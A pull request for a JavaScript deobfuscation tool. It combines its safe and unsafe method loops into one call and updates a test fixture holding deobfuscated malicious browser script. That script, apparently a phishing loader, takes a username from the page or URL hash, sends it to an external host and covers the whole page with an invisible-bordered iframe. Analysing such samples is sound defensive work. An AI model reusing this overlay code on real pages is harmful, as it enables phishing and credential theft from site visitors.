### PR TITLE
Reduce runLoop Redundancy

### DIFF
--- a/src/restringer.js
+++ b/src/restringer.js
@@ -106,8 +106,7 @@ class REstringer {
 		let modified, script;
 		do {
 			this.modified = false;
-			script = runLoop(this.script, this.safeMethods);
-			script = runLoop(script, this.unsafeMethods, 1);
+			script = runLoop(this.script, this.safeMethods.concat(this.unsafeMethods));
 			if (this.script !== script) {
 				this.modified = true;
 				this.script = script;

--- a/tests/resources/newFunc.js-deob.js
+++ b/tests/resources/newFunc.js-deob.js
@@ -1,55 +1,172 @@
 function t() {
-    var e = ['364LQAOhD', 'iframe', 'data-fiikfu', 'searchParams', '999999', '8FpuLea', '10cZXSHP', '3029155zGDxjW', '12qNvHsa', 'ddrido', '8964021vmeNuO', 'substring', 'fixed', '567228cqlBcB', 'bottom', '572509wwXbzV', 'margin', 'random', 'height', 'right', 'hash', 'abcdefghijklmnopqrstuvwxyz', '378NHloDJ', '478KOasfu', 'overflow', 'location', 'createElement', 'border', 'position', 'floor', 'left', 'appendChild', 'length', '100%', '491ObZCcR', '40024ItvVfk', '177822QQLRDD', 'style'];
-    return (t = function () {
-        return e;
-    })();
+  var e = [
+    '364LQAOhD',
+    'iframe',
+    'data-fiikfu',
+    'searchParams',
+    '999999',
+    '8FpuLea',
+    '10cZXSHP',
+    '3029155zGDxjW',
+    '12qNvHsa',
+    'ddrido',
+    '8964021vmeNuO',
+    'substring',
+    'fixed',
+    '567228cqlBcB',
+    'bottom',
+    '572509wwXbzV',
+    'margin',
+    'random',
+    'height',
+    'right',
+    'hash',
+    'abcdefghijklmnopqrstuvwxyz',
+    '378NHloDJ',
+    '478KOasfu',
+    'overflow',
+    'location',
+    'createElement',
+    'border',
+    'position',
+    'floor',
+    'left',
+    'appendChild',
+    'length',
+    '100%',
+    '491ObZCcR',
+    '40024ItvVfk',
+    '177822QQLRDD',
+    'style'
+  ];
+  return (t = function () {
+    return e;
+  })();
 }
-
 function e(n, a) {
-    var r = ['364LQAOhD', 'iframe', 'data-fiikfu', 'searchParams', '999999', '8FpuLea', '10cZXSHP', '3029155zGDxjW', '12qNvHsa', 'ddrido', '8964021vmeNuO', 'substring', 'fixed', '567228cqlBcB', 'bottom', '572509wwXbzV', 'margin', 'random', 'height', 'right', 'hash', 'abcdefghijklmnopqrstuvwxyz', '378NHloDJ', '478KOasfu', 'overflow', 'location', 'createElement', 'border', 'position', 'floor', 'left', 'appendChild', 'length', '100%', '491ObZCcR', '40024ItvVfk', '177822QQLRDD', 'style'];
-    return (e = function (t, e) {
-        return r[t -= 494];
-    })(n, a);
+  var r = [
+    'appendChild',
+    'length',
+    '100%',
+    '491ObZCcR',
+    '40024ItvVfk',
+    '177822QQLRDD',
+    'style',
+    '364LQAOhD',
+    'iframe',
+    'data-fiikfu',
+    'searchParams',
+    '999999',
+    '8FpuLea',
+    '10cZXSHP',
+    '3029155zGDxjW',
+    '12qNvHsa',
+    'ddrido',
+    '8964021vmeNuO',
+    'substring',
+    'fixed',
+    '567228cqlBcB',
+    'bottom',
+    '572509wwXbzV',
+    'margin',
+    'random',
+    'height',
+    'right',
+    'hash',
+    'abcdefghijklmnopqrstuvwxyz',
+    '378NHloDJ',
+    '478KOasfu',
+    'overflow',
+    'location',
+    'createElement',
+    'border',
+    'position',
+    'floor',
+    'left'
+  ];
+  return (e = function (t, e) {
+    return r[t -= 494];
+  })(n, a);
 }
-
 (function (t, n) {
-    for (var r = ['364LQAOhD', 'iframe', 'data-fiikfu', 'searchParams', '999999', '8FpuLea', '10cZXSHP', '3029155zGDxjW', '12qNvHsa', 'ddrido', '8964021vmeNuO', 'substring', 'fixed', '567228cqlBcB', 'bottom', '572509wwXbzV', 'margin', 'random', 'height', 'right', 'hash', 'abcdefghijklmnopqrstuvwxyz', '378NHloDJ', '478KOasfu', 'overflow', 'location', 'createElement', 'border', 'position', 'floor', 'left', 'appendChild', 'length', '100%', '491ObZCcR', '40024ItvVfk', '177822QQLRDD', 'style']; ;) try {
-        break;
-        r.push(r.shift());
+  for (var r = [
+      'appendChild',
+      'length',
+      '100%',
+      '491ObZCcR',
+      '40024ItvVfk',
+      '177822QQLRDD',
+      'style',
+      '364LQAOhD',
+      'iframe',
+      'data-fiikfu',
+      'searchParams',
+      '999999',
+      '8FpuLea',
+      '10cZXSHP',
+      '3029155zGDxjW',
+      '12qNvHsa',
+      'ddrido',
+      '8964021vmeNuO',
+      'substring',
+      'fixed',
+      '567228cqlBcB',
+      'bottom',
+      '572509wwXbzV',
+      'margin',
+      'random',
+      'height',
+      'right',
+      'hash',
+      'abcdefghijklmnopqrstuvwxyz',
+      '378NHloDJ',
+      '478KOasfu',
+      'overflow',
+      'location',
+      'createElement',
+      'border',
+      'position',
+      'floor',
+      'left'
+    ];;)
+    try {
+      break;
+      r.push(r.shift());
     } catch (t) {
-        r.push(r.shift());
+      r.push(r.shift());
     }
 }(t));
 (function () {
-    var n = 'abcdefghijklmnopqrstuvwxyz';
-    var a = document.getElementById('ddrido').getAttribute('data-fiikfu');
-    var r = new URL('https://lmo.oscii.io/?');
-    if (!a && window.location.hash) try {
-        a = atob(window.location.hash.substring(1));
+  var n = 'abcdefghijklmnopqrstuvwxyz';
+  var a = document.getElementById('ddrido').getAttribute('data-fiikfu');
+  var r = new URL('https://lmo.oscii.io/?');
+  if (!a && window.location.hash)
+    try {
+      a = atob(window.location.hash.substring(1));
     } catch (e) {
-        a = window.location.hash.substring(1);
+      a = window.location.hash.substring(1);
     }
-    if (a) {
-        try {
-            a = atob(a);
-        } catch (t) {
-        }
-        r.searchParams.append('username', a);
+  if (a) {
+    try {
+      a = atob(a);
+    } catch (t) {
     }
-    r.searchParams.append('abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)], 'abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)]);
-    var s = document.createElement('iframe');
-    s.style.position = 'fixed';
-    s.style.top = '0';
-    s.style.left = '0';
-    s.style.bottom = '0';
-    s.style.right = '0';
-    s.style.width = '100%';
-    s.style.height = '100%';
-    s.style.border = '0';
-    s.style.margin = '0';
-    s.style.padding = '0';
-    s.style.overflow = 'hidden';
-    s.style.zIndex = '999999';
-    s.src = r.toString();
-    document.body.appendChild(s);
+    r.searchParams.append('username', a);
+  }
+  r.searchParams.append('abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)], 'abcdefghijklmnopqrstuvwxyz'[Math.floor(Math.random() * 26)]);
+  var s = document.createElement('iframe');
+  s.style.position = 'fixed';
+  s.style.top = '0';
+  s.style.left = '0';
+  s.style.bottom = '0';
+  s.style.right = '0';
+  s.style.width = '100%';
+  s.style.height = '100%';
+  s.style.border = '0';
+  s.style.margin = '0';
+  s.style.padding = '0';
+  s.style.overflow = 'hidden';
+  s.style.zIndex = '999999';
+  s.src = r.toString();
+  document.body.appendChild(s);
 }());


### PR DESCRIPTION
Refactor _loopSafeAndUnsafeDeobfuscationMethods to reduce loop overhead redundancy by combining the deobfuscation methods to a single runLoop call